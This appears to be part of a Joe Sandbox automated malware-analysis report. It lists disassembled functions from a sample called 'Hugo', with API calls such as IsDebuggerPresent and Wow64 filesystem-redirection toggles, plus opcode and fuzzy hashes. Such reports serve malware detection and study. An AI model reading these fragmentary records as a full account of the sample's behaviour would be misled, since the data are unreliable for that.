                                                                                                                                                                                                              • Instruction ID: 5294b965b104b5a90f394dc6018bd2facd474cbb93c01fe4443267fccef07e89
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c8f76b4e2def877820c68bd2f64dc63f94b1b051054971770b683c78bc7ecc5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4F089705443889BE774C760DC49FDA33ACEB45310F104519E60AC70C0DB749588FB15
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00F23006
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                                                              • String ID: CALL
                                                                                                                                                                                                              • API String ID: 1385522511-4196123274
                                                                                                                                                                                                              • Opcode ID: 9f7ca084542db15b115cd098b80e043b35bb39b440833b69257304afcad6e29f
                                                                                                                                                                                                              • Instruction ID: 1bdce75d1d6fd0a672a841f3f83ddcfb23ced2f112790822ddc91b61a3b0ff39
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f7ca084542db15b115cd098b80e043b35bb39b440833b69257304afcad6e29f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0222ABB0A08311AFC754DF24D884B2ABBF1BF84324F14895DF4968B3A1D775E941EB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00F5413B
                                                                                                                                                                                                                • Part of subcall function 00F15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F155D1,?,?,00F54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F15871
                                                                                                                                                                                                                • Part of subcall function 00F13A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F13A76
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                              • String ID: X
                                                                                                                                                                                                              • API String ID: 779396738-3081909835
                                                                                                                                                                                                              • Opcode ID: 507752eadf1fe4efb40c3b554b6e6c3c5d0157e32ae74365eba18d2dd74aa1c0
                                                                                                                                                                                                              • Instruction ID: bfab1334c7631d396e33e85d8ce940dae8ebfcea75fc19a8675bb5fd71ba877e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 507752eadf1fe4efb40c3b554b6e6c3c5d0157e32ae74365eba18d2dd74aa1c0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C421C371A002589BDB41DF94CC05BEE7BFDAF49314F04801AE545AB241DBB89A89AF61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F13A3C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: IconNotifyShell_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1144537725-0
                                                                                                                                                                                                              • Opcode ID: e137cb0971ea294f16be8f7b9c2411831235ef40718d7d11f5ad061fba2839a8
                                                                                                                                                                                                              • Instruction ID: 89dda97a1dd3b8b0707664a6b98bc763480ed146e8dc3767f456caaef266a596
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e137cb0971ea294f16be8f7b9c2411831235ef40718d7d11f5ad061fba2839a8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F31B1715043048FE760DF24D8857D7BBE8FF49718F00092EEADA87240E775A988DB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsThemeActive.UXTHEME ref: 00F1333D
                                                                                                                                                                                                                • Part of subcall function 00F132E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F132FB
                                                                                                                                                                                                                • Part of subcall function 00F132E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F13312
                                                                                                                                                                                                                • Part of subcall function 00F1338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00F13368,?), ref: 00F133BB
                                                                                                                                                                                                                • Part of subcall function 00F1338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00F13368,?), ref: 00F133CE
                                                                                                                                                                                                                • Part of subcall function 00F1338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00FE2418,00FE2400,?,?,?,?,?,?,00F13368,?), ref: 00F1343A
                                                                                                                                                                                                                • Part of subcall function 00F1338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00FE2418,?,?,?,?,?,?,?,00F13368,?), ref: 00F134BB
                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00F13377
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1550534281-0
                                                                                                                                                                                                              • Opcode ID: 879dbad5c9263e6ee50fed56c0774d10f570aecd9dff27b6fc3de37eebaf8e4b
                                                                                                                                                                                                              • Instruction ID: 4baee83bf8cdae33fbd7aa407a707b3a4b7108b47aa54fa751907274f9a21121
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 879dbad5c9263e6ee50fed56c0774d10f570aecd9dff27b6fc3de37eebaf8e4b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7FF054725543CC9FD7406F60ED4AB6437A8A701719F044915B5094E1E2EBBA8590BF44
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00F1CEEE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1385522511-0
                                                                                                                                                                                                              • Opcode ID: f454abf2bf0aefc87ba9f738d36f2dabeb530679eed1b0c0e6cfbb970e84e09f
                                                                                                                                                                                                              • Instruction ID: 3751c8ee236dfff6d14a086993eb17399d836ac2318ee6e00f4f13380d69da9c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f454abf2bf0aefc87ba9f738d36f2dabeb530679eed1b0c0e6cfbb970e84e09f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4432BD75E402499FDB20CF54C888BFAB7B5FF45320F288059E916AB251C735ED81EB91
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2948472770-0
                                                                                                                                                                                                              • Opcode ID: 6a016d0c5d67ed281644220c9a90bf2d5ce296872dbae9b4f62b539f4ad9003f
                                                                                                                                                                                                              • Instruction ID: 06f76088a2b8460ce7ccb2bb31957151d2101ace34bdafb40df234129f995373
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a016d0c5d67ed281644220c9a90bf2d5ce296872dbae9b4f62b539f4ad9003f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3D17C35E1420ADFDF14EF98C8819EDBBB5FF48320F14415AE915AB291DB34AD81DB90
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f4eba51ef852d60b164941a4ce7ba371d5b88e233b4a4d269020a8db57f9b608
                                                                                                                                                                                                              • Instruction ID: 412747f2d84535b784fa457fccd2fefa0e7fa848a1dd9185a440c34cc930cd23
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4eba51ef852d60b164941a4ce7ba371d5b88e233b4a4d269020a8db57f9b608
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E51C435E00248EFDB10DF68CC41BAA7BA1EB85374F198168E8189B392D735ED46DB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00F7FCCE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuffCharLower
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2358735015-0
                                                                                                                                                                                                              • Opcode ID: 37e04971e0754e2ea5142b8db994c5d5cdd1de16d62668a47d01bad1ddeceead
                                                                                                                                                                                                              • Instruction ID: d4e2210b8558a8e51295fceba27fe11b8908016892dde0069aa74978b1a067b8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37e04971e0754e2ea5142b8db994c5d5cdd1de16d62668a47d01bad1ddeceead
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B441B576900209AFCB21AF68CC819AEB7F9EF44324B10853FE516D7251EB70DA49AB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F1668B,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F1664A
                                                                                                                                                                                                                • Part of subcall function 00F1663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F1665C
                                                                                                                                                                                                                • Part of subcall function 00F1663E: FreeLibrary.KERNEL32(00000000,?,?,00F1668B,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F1666E
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F166AB
                                                                                                                                                                                                                • Part of subcall function 00F16607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F55657,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F16610
                                                                                                                                                                                                                • Part of subcall function 00F16607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F16622
                                                                                                                                                                                                                • Part of subcall function 00F16607: FreeLibrary.KERNEL32(00000000,?,?,00F55657,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F16635
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2632591731-0
                                                                                                                                                                                                              • Opcode ID: eba91f09095f75a8c0a21965d729af771e2b3a63d73781af043e98c8d1e27da0
                                                                                                                                                                                                              • Instruction ID: b7a9e4a6bc584c72880dfde594d1a63f287865bad04458bdbdd6a2491668fe9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eba91f09095f75a8c0a21965d729af771e2b3a63d73781af043e98c8d1e27da0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9811E372600205EACF14FB20CC12BED7BA59F50B21F10442DF542EA1C2EEB9DA85FB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __wsopen_s
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3347428461-0
                                                                                                                                                                                                              • Opcode ID: 33c3c1ac1bc8fd3e06ee5a34ee29399ece430e70b92fa5c04902e362536726ac
                                                                                                                                                                                                              • Instruction ID: 2266340a3ea9184ec411fca64196685913108a8e4f41a7a1ca231c0766cc7e9f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33c3c1ac1bc8fd3e06ee5a34ee29399ece430e70b92fa5c04902e362536726ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71115A7290410AAFCF05DF58E94099E7BF4FF48310F114069FC08AB311DA31EA12DB64
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                              • Instruction ID: d90ce27aec36fe79e0e914a8fae15c14d02f491bcb4cef7e583bb9403bf742a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7F0CD3290262097D6713A7A9C0575B37988F42774F100725FD65971D2DB78D802B7E2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 176396367-0
                                                                                                                                                                                                              • Opcode ID: 72016342fb2288f5c97d020dcdbcbf511746de536e6c34c5e74ca06ec4170ab8
                                                                                                                                                                                                              • Instruction ID: 50e95103c5b483c804c2b466af731aaf9678f79212be168b017f14db6352fa0f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72016342fb2288f5c97d020dcdbcbf511746de536e6c34c5e74ca06ec4170ab8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9F0C8B3601704AED714AF29DC06BA7BB98EB44770F10822AFA19CB1D1DB35E550DBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00F36A79,?,0000015D,?,?,?,?,00F385B0,000000FF,00000000,?,?), ref: 00F43BC5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 9df3aef6635ffdaf2d67d6aa3876a43651f0e9aaccde40db24ab8ebb837fa091
                                                                                                                                                                                                              • Instruction ID: 4b479f8a742c1e840149408e7dfd2254b9e134cec670279dfbf540496d9848de
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9df3aef6635ffdaf2d67d6aa3876a43651f0e9aaccde40db24ab8ebb837fa091
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13E09232A40624A6EA2137769C02F5B3E5DEFC17B0F150161FC65D6A91DF74CE40B5E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 48464e4ce415238ed292dce73c2a3706c8322132d4d0411d1861686149d45429
                                                                                                                                                                                                              • Instruction ID: e40d551196f0b21032ed8de2c166639dbc648353fde32861bd3dc496dd6439a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48464e4ce415238ed292dce73c2a3706c8322132d4d0411d1861686149d45429
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88F039B1505752CFCB349F64D8A0896BBF4BF1532A324897EE6D7C6610CB329884EF50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __fread_nolock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2638373210-0
                                                                                                                                                                                                              • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
